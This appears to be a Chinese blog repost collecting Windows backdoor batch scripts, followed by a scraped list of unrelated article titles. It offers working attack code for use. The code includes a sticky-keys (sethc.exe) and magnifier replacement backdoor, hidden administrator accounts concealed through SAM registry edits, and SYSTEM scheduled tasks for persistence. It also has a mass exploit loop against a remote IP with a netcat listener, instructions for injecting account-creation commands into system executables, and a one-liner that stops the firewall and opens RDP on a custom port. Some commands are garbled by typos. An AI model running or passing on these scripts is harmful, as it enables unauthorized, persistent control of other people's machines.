几个后门的批处理
来源:互联网 发布:mysql workbench使用 编辑:程序博客网 时间:2024/05/16 01:41
Shift后门
-----------------------------------------
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门 By:qing QQ:33089632
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:/windows/explorer.exe c:/windows/system32/sethc.exe
echo 完成百分之 50
copy c:/windows/system32/sethc.exe c:/windows/system32/dllcache/sethc.exe
echo 完成百分之 80
attrib c:/windows/system32/sethc.exe +h
echo 完成百分之 90
attrib c:/windows/system32/dllcache/sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo 感谢您使用Shift后门
echo.
echo By:qing QQ: 33089632
echo.
echo http://www.shenmicaobi.com/
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit
--------------------------------------------------------------
第三个:自动踢人(3389肉机保护自己专用)
@echo off
logoff 1
del log.bat
logoff后面的1改成自己登陆的ID号,用query user查看
第四个: 批量自动溢出
@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521
先自己用NC监听端口,多开几个,然后指行,就自动溢出
schtasks /create /tn "常驻" /tr C:WINDOWSauto.bat /sc minute /mo 30 /ru "system"
这样就在对方电脑上建立了一个以SYSTEM权限运行的计划任务,这个计划任务每隔30分钟运行一次
建立注册表也不能查看到的账户
net user admins$ 1234567 /add
net localgroup administrators admins$ /add
Echo HKEY_LOCAL_MACHINE/SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names [1] >>c:/tem.ini
regini c:/tem.ini
regedit /e c:/1.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users
net user admins$ /del
regedit /s c:/1.reg
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names [0] >c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/ [0] >>c:/tem.ini
regini c:/tem.ini
del c:/tem.ini
del c:/1.reg
del %0
===============================================
循环不断地建立账户
@echo off
@attrib +s + r xyt.bat
@net user hack95$ /del
@net user hack95$ 123456. /add
@net localgroup administrators hack95$ /add
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:/WINNT/SYSTEM32/log.bat > c:/WINNT/SYSTEM32/xyt.bat
@echo at 23:00 c:/WINNT/SYSTEM32/log.bat >> c:/WINNT/SYSTEM32/xyt.bat
@at 11:05 c:/WINNT/SYSTEM32/xyt.bat
@at 23:05 c:/WINNT/SYSTEM32/xyt.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为hack95$,密码为123456.
copy c:\wmdows\explorer.exe c:\windows\system32\sethc.exe
copy c:\wmdows\system32\sethc.exe c:\windows\system32\dUcache\sethc.exe
attrib c:\windows\system32\sethc.exe+h
atmb c:\wmdows\svstem32\dUcache\sethc.exe+h
留个放大镜后门
上面利用的是粘滞键辅助工具。其实系统中还有其它的辅助工具。比如“放大镜”——按下Win+U组合键,即可打开放大镜辅助工具。可以用与上面相同的方法来创建一个后门。不过这里我们利用工具来完成操作,并且还要为后门加上一个密码。
运行“放大镜后门生成器”,在“后门启动密码”中输入要设置的后门密码。然后点击“生成”按钮,指定生成文件名路径为“C:\ivy.exe”。然后点击“开始”菜单-“运行”。输入命令“CMD”。回车后打开命令提示符窗口。在命令窗口中执行如下命令:
copy %systemroot%/system32/magnify.exe %systemroot%/system32/nagnify.exe
copy C /ivy exe %systemroot%/system32/magmfy.exe
copy C:/ivy.exe %systemroot%/system32/dllcache/magnify.exe
执行命令成功后,后门就创建成功了。以后在本地或3389远程登录界面中。按下Win+U组合键,打开辅助工具对话框,选择“放大镜”,点击“启动”按钮,要求输入设定的后门启动密码。确定后。打开后门程序,可执行“cmd.exe”和程序自己添加自定义用户。直接输入要添加的用户名和密码。点击“添加”按钮即可。要执行CMD命令的话,可点击“执行CMD命令”按钮,即可打开CMD命令提示符窗口。
1.用bat转exe工具将建立账号的bat转成exe,替换掉系统的常用程序,如sougouupdate
2.建立只能在注册表里看见的隐藏账号,先在cmd下建立个管理员账号,再在注册表里将相对应的账号的注册项导出,再删除该账号,然后再导入这两个注册表项即可。
3.在系统关键程序中添加附加数据,代码:cmd /c net user hack95$ 123456 /add&net localgroup administrators hack95$ /add&net user hack95$ /active:yes
首先用OD打开,记下入口点,然后找个0区域,记下该地址,然后右键编辑在ASCII栏里粘贴如上代码,再加入汇编代码push 0(表示隐藏运行),并记下此地址,再push+代码开始的地址,再在下一地址汇编call WinExec,最后跳回原来的入口点。
4.bat转exe,再用易语言将该exe与记事本等常用文件捆绑替换掉系统里的、
==================================================
一:在explorer.exe中加保持2003系统开3389代码(2000系统的有一点变化,大家自己替换)
cmd /c net stop sharedaccess&echo Windows Registry Editor Version 5.00>>c:/1.reg&echo. >>c:/1.reg&echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]>>c:/1.reg&echo "fDenyTSConnections"=dword:00000000>>c:/1.reg&echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>>c:/1.reg&echo "PortNumber"=dword:00000c55>>c:/1.reg&echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp]>>c:/1.reg&echo "PortNumber"=dword:00000c55>>c:/1.reg®edit /s c:/1.reg&
del c:/1.reg
- 几个后门的批处理
- 用批处理写的后门
- 用批处理写的后门 永不被杀
- 几个批处理的写法
- 批处理开启TelNet后门
- [zt]永不被杀的后门-批处理的精华
- 几个常用的shell批处理
- 记录几个后门工具
- 关于批处理的几个恶搞系列
- dos下批处理的几个小技巧
- 批处理延时启动的几个方法
- cmd批处理延时启动的几个方法
- 批处理延时启动的几个方法
- 粘滞键后门-自动创建-批处理版
- 几个批处理例子
- 几个批处理命令
- 几个常用批处理
- 几个批处理小函数
- Windows运行命令大全
- 新手起航4-5-2011
- 博客开张了,记录幸福的点滴
- 一次编写 多次重用
- Ubuntu10.04 java CLASSPATH及环境变量
- 几个后门的批处理
- XTU - 1095 连续自然数之和
- delphi 执行一个外部程序,当外部程序结束后言主程序立即响应
- 一个有趣的方法
- constructor很重要
- Android放大镜的实现
- 【转】magento安装域名出错Please enter a valid URL. Protocol is required
- 整除11
- Mstr Web客户端安装方式